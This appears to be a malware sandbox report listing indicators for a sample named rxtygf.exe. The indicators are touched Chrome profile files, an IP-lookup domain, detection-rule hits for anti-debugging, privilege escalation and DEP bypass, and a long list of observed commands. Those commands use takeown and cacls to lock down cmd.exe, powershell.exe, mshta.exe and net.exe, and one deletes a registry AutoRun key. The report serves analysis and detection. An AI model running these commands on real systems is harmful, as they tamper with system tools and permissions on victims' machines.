file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\index |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Preferences |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Crashpad\reports\8dc74f67-39b6-4058-9ac1-6f782fcd0d62.dmp |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG.old |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOCK |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOCK |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\previews_opt_out.db |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Last Session |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Cache\index |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\b1152479bea6c46553d8c242ffa5edf2b0a050a7\index.txt |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Cache |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Data |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Favicons |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\LOG |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm\LOG |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\b1152479bea6c46553d8c242ffa5edf2b0a050a7\290dcccb-9986-4f16-98a9-c54df8312e93\52eca80efb7ea8c5_0 |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\TransportSecurity |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_1 |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_0 |
file | C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_3 |
domain | api.ipify.org |
file | C:\Users\Public\Pictures\Kill-Delete.bat |
file | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Narrator.lnk |
file | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\computer.lnk |
file | C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\Fax Recipient.lnk |
file | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Windows Explorer.lnk |
file | C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Window Switcher.lnk |
file | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Ease of Access.lnk |
file | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Notepad.lnk |
file | C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Shows Desktop.lnk |
file | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Command Prompt.lnk |
file | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Private Character Editor.lnk |
file | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\On-Screen Keyboard.lnk |
file | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Magnify.lnk |
file | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Control Panel.lnk |
file | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Help.lnk |
file | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Run.lnk |
cmdline | cacls C:\Windows\SysWOW64\mshta.exe /e /g Administrators:r |
cmdline | cacls C:\Windows\SysWOW64\cmd.exe /e /d "network service" |
cmdline | cacls C:\Windows\system32\cmd.exe /e /g Administrators:r |
cmdline | cacls C:\Windows\SysWOW64\cmd.exe /e /g Administrators:r |
cmdline | cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d "network service" |
cmdline | takeown /f C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /a |
cmdline | takeown /f C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /a |
cmdline | cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d system |
cmdline | cacls C:\Windows\SysWOW64\cmd.exe /e /d mssqlserver |
cmdline | cacls C:\Windows\SysWOW64\mshta.exe /g Administrators:f |
cmdline | cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d "network service" |
cmdline | cacls C:\Windows\system32\cmd.exe /g Administrators:f |
cmdline | takeown /f C:\Windows\system32\cmd.exe /a |
cmdline | C:\Windows\system32\cmd.exe /S /D /c" echo Y" |
cmdline | cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r |
cmdline | cacls C:\Windows\SysWOW64\cmd.exe /e /g system:r |
cmdline | cacls C:\Windows\SysWOW64\mshta.exe /e /d mssqlserver |
cmdline | cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE |
cmdline | cacls C:\Windows\system32\cmd.exe /e /g system:r |
cmdline | takeown /f C:\Windows\SysWOW64\cmd.exe /a |
cmdline | cacls C:\Windows\SysWOW64\mshta.exe /e /d SERVICE |
cmdline | cacls C:\Windows\system32\cmd.exe /e /d SERVICE |
cmdline | cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f |
cmdline | cacls C:\Windows\SysWOW64\cmd.exe /e /g Users:r |
cmdline | takeown /f C:\Windows\SysWOW64\mshta.exe /a |
cmdline | cacls C:\Windows\system32\mshta.exe /g Administrators:f |
cmdline | cacls C:\Windows\system32\mshta.exe /e /d system |
cmdline | cacls C:\Windows\system32\cmd.exe /e /d mssqlserver |
cmdline | cacls C:\Windows\system32\cmd.exe /e /d "network service" |
cmdline | cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f |
cmdline | C:\Windows\system32\cmd.exe /S /D /c" echo y" |
cmdline | cacls C:\Windows\system32\cmd.exe /e /g Users:r |
cmdline | cacls C:\Windows\system32\mshta.exe /e /g Administrators:r |
cmdline | cacls C:\Windows\SysWOW64\cmd.exe /e /d SERVICE |
cmdline | cacls C:\Windows\SysWOW64\mshta.exe /e /d "network service" |
cmdline | cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d mssql$sqlexpress |
cmdline | cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r |
cmdline | cacls C:\Windows\system32\mshta.exe /e /d mssqlserver |
cmdline | cacls C:\Windows\system32\mshta.exe /e /d mssql$sqlexpress |
cmdline | cacls C:\Windows\SysWOW64\cmd.exe /e /d mssql$sqlexpress |
cmdline | cacls C:\Windows\system32\cmd.exe /e /d mssql$sqlexpress |
cmdline | cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d mssqlserver |
cmdline | cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE |
cmdline | cacls C:\Windows\SysWOW64\mshta.exe /e /d system |
cmdline | cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r |
cmdline | cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d mssqlserver |
cmdline | cacls C:\Windows\SysWOW64\cmd.exe /g Administrators:f |
cmdline | cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d mssql$sqlexpress |
cmdline | cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d system |
cmdline | cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r |
url | https://www.torproject.org/download/ |
description | Match Windows Http API call | rule | Str_Win32_Http_API | ||||||
description | Escalate priviledges | rule | Escalate_priviledges | ||||||
description | Communications over HTTP | rule | Network_HTTP | ||||||
description | Match Windows Inet API call | rule | Str_Win32_Internet_API | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep |
cmdline | cacls C:\Windows\system32\net.exe /e /d system |
cmdline | cacls C:\Windows\system32\net.exe /e /d "network service" |
cmdline | cacls C:\Windows\system32\net.exe /e /g Users:r |
cmdline | cacls C:\Windows\system32\net.exe /g Administrators:f |
cmdline | cacls C:\Windows\system32\net.exe /e /d SERVICE |
cmdline | cacls C:\Windows\SysWOW64\net.exe /g Administrators:f |
cmdline | cacls C:\Windows\system32\net.exe /e /d mssql$sqlexpress |
cmdline | cacls C:\Windows\SysWOW64\net.exe /e /d system |
cmdline | cacls C:\Windows\system32\net.exe /e /d mssqlserver |
cmdline | cacls C:\Windows\SysWOW64\net.exe /e /d "network service" |
cmdline | reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor" /v "AutoRun" /f |
cmdline | cacls C:\Windows\SysWOW64\net.exe /e /g Administrators:r |
cmdline | cacls C:\Windows\SysWOW64\net.exe /e /d SERVICE |
cmdline | cacls C:\Windows\SysWOW64\net.exe /e /d mssql$sqlexpress |
cmdline | takeown /f C:\Windows\SysWOW64\net.exe /a |
cmdline | cacls C:\Windows\SysWOW64\net.exe /e /g Users:r |
cmdline | takeown /f C:\Windows\system32\net.exe /a |
cmdline | cacls C:\Windows\SysWOW64\net.exe /e /d mssqlserver |
cmdline | cacls C:\Windows\system32\net.exe /e /g Administrators:r |
description | rxtygf.exe tried to sleep 5456509 seconds, actually delayed analysis time by 5456509 seconds |